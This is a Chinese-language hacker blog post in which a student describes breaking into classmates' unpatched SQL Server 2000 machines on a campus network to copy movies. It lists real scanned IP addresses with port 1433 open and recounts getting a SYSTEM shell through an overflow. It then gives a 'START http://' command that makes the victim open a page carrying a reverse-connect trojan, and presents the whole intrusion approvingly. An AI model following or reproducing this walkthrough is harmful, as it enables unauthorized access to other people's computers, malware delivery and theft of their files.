最近，畢業設計也做完了，閑的無聊！每天都是跟同學在一起斗地主，但是斗久了就無聊啊。看片吧，租了幾個后，感覺不和算，每次看一個片都得花好幾塊錢，從別人的電腦里面拷吧！但是現在啊，大家的安全意識都高了，都裝了防火墻，（比如：天網，瑞星），更可恨的是現在最新的瑞星病毒防火墻，對每次的溢出攻擊都提示，類似“來自：XX。XX。XX。XX的MS04011的攻擊”的語句，不僅進不去別人的機器，還被人罵啊，555555555。學校還分了多個VPN，還把135.136.137138。139，445端口都屏蔽了，防止大家互相共享東西，郁悶！
怎么辦呢 ？好象大家畢業設計都用SQL2K做的服務器，一般學校的這個網速，補丁是肯定下不了的，大家都沒有打，我記得我進學校的一個服務器都是這么進去的，我想大家應該也不會打啊！
拿起superscan4.0掃了下1433的，呵呵強哈，一會就出來N多個保存下來隨便看下哈：
* + 202.207.86.186
|___1433Microsoft-SQL-Server
* + 202.207.87.182
|___1433Microsoft-SQL-Server
* + 202.207.91.117
|___1433Microsoft-SQL-Server
* + 202.207.92.117
|___1433Microsoft-SQL-Server
* + 202.207.93.153
|___1433Microsoft-SQL-Server
* + 202.207.93.236
|___1433Microsoft-SQL-Server
* + 202.207.93.242
|___1433Microsoft-SQL-Server
呵呵，雖然不是很多，不過有幾個就可以了，我不求別的只求能有幾個片就可以了！
　　拿起SQL工具，溢出，得到CMD的SYSTEM權限，但是我要這個權限沒有用啊。我又進不去拷貝不了電影啊！在CMD下面看到不少好片名，郁悶！我想起用TFTP傳送一個木馬過去，但是不成功！·估計是防火墻不允許！
　　我在自己的機器開了ＩＩＳ服務，把ＦＴＰ也開了，登陸不了ＦＴＰ。看來這個方法是不行了啊！
　　　那就怎么辦呢？看到片名，看不到內容，郁悶得很啊！
　　　突然看到網上有一個遙控下載者，這個代碼我到是看過，我突然靈機一動，哈哈，我自己做一個內部的網頁，里面加個反彈木馬不就可以了！只要他訪問，就ＯＫ拉！
　　　關鍵的問題是怎么讓他訪問這個網頁啊！這點最郁悶啊！，我在ＣＭＤ下雖然擁有ＳＹＳＴＥＭ權限但是，我卻不可以上網啊！郁悶啊！
　　突然想了下，我自己到ＳＹＳＴＥＭ，ＳＹＳＴＥＭ３２，ＷＩＮＮＴ目錄下去看看，究竟有多少ＤＯＳ命令可以用啊。！最后我發現了這個命令：ＳＴＡＲＴ命令，估計大家都用的少！我把他的ＨＬＰ貼出來給大家看看！：
啟動另一個窗口運行指定的程序或命令。
START ["title"] [/Dpath] [/i] [/MIN] [/MAX] [/SEPARATE | /SHARED]
 [/LOW | /NORMAL | /HIGH | /REALTIME | /ABOVENORMAL | /BELOWNORMAL]
 [/WAIT] [/b] [command/program]
 [parameters]
 "title" 在窗口標題欄中顯示的標題。
 path起始目錄
 B 在不創建新窗口的情況下開始應用程序。 除非
 啟動 ^C 處理，否則該應用程序會忽略 ^C 處理；
^Break 是唯一可以中斷該應用程序的方式
 I 新環境是傳遞給 cmd.exe 的原始環境，
 而不是當前環境
 MIN 開始時窗口最小化
 MAX 開始時窗口最大化
 SEPARATE在分開的空間內開始 16 位 Windows 程序
 SHARED在分共享的空間內開始 16 位 Windows 程序
 LOW 在 IDLE 優先級類別開始應用程序
 NORMAL在 NORMAL 優先級類別開始應用程序
 HIGH在 HIGH 優先級類別開始應用程序
 REALTIME在 REALTIME 優先級類別開始應用程序
 ABOVENORMAL 在 ABOVENORMAL 優先級類別開始應用程序
 BELOWNORMAL 在 BELOWNORMAL 優先級類別開始應用程序
 WAIT啟動應用程序并等候它結束
 command/program
 如果是內部 cmd 命令或批文件，那么該命令處理器是
 用 /K 命令選項運行 cmd.exe 的。這表示該窗口在命令運行
 后仍然存在。
 如果不是內部 cmd 命令或批文件，則是一個程序，并
 作為窗口應用程序或控制臺應用程序運行。
 parameters這些為傳送到命令/程序的參數

如果命令擴展名被啟用，通過命令行或 START 命令的外部命令
調用會如下改變:
將文件名作為命令鍵入，非可執行文件可以通過文件關聯調用。
 (例如， WORD.DOC 會調用跟 .DOC 文件擴展名關聯的應用程序)。
 關于如何從命令腳本內部創建這些關聯，請參閱 ASSOC 和
FTYPE 命令。
執行的應用程序是 32-位 GUI 應用程序時，CMD.EXE 不等應用
 程序終止就返回命令提示。如果在命令腳本內執行，該新行為
 則不會發生。
如果執行的命令行的第一個符號是不帶擴展名或路徑修飾符的
 字符串 "CMD"，"CMD" 會被COMSPEC 變量的數值所替換。這
 防止從當前目錄抓出 CMD.EXE。
如果執行的命令行的第一個符號沒有擴展名，CMD.EXE 會使用
 PATHEXT 環境變量的數值來決定要以什么順序尋找哪些擴展
 名。PATHEXT 變量的默認值是:
 .COM;.EXE;.BAT;.CMD
 請注意，該語法跟 PATH 變量的一樣，分號隔開不同的元素。
查找可執行文件時，如果沒有相配的擴展名，看一看該名稱是否
與目錄名相配。如果確實如此，START 會在那個路徑上調用
Explorer。如果從命令行執行，則等同于對那個路徑作 CD /D。

　　我直接在ＣＭＤ下面打"ＳＴＡＲＴ　ＨＴＴＰ：／／muma"我木馬得地址就可以了！
　　　拿起我自己熟悉的木馬看著熟悉的木馬界面，把一部部ＭＯＶＩＥ，ＣＯＰＹ過來，過癮啊！省了不少錢啊！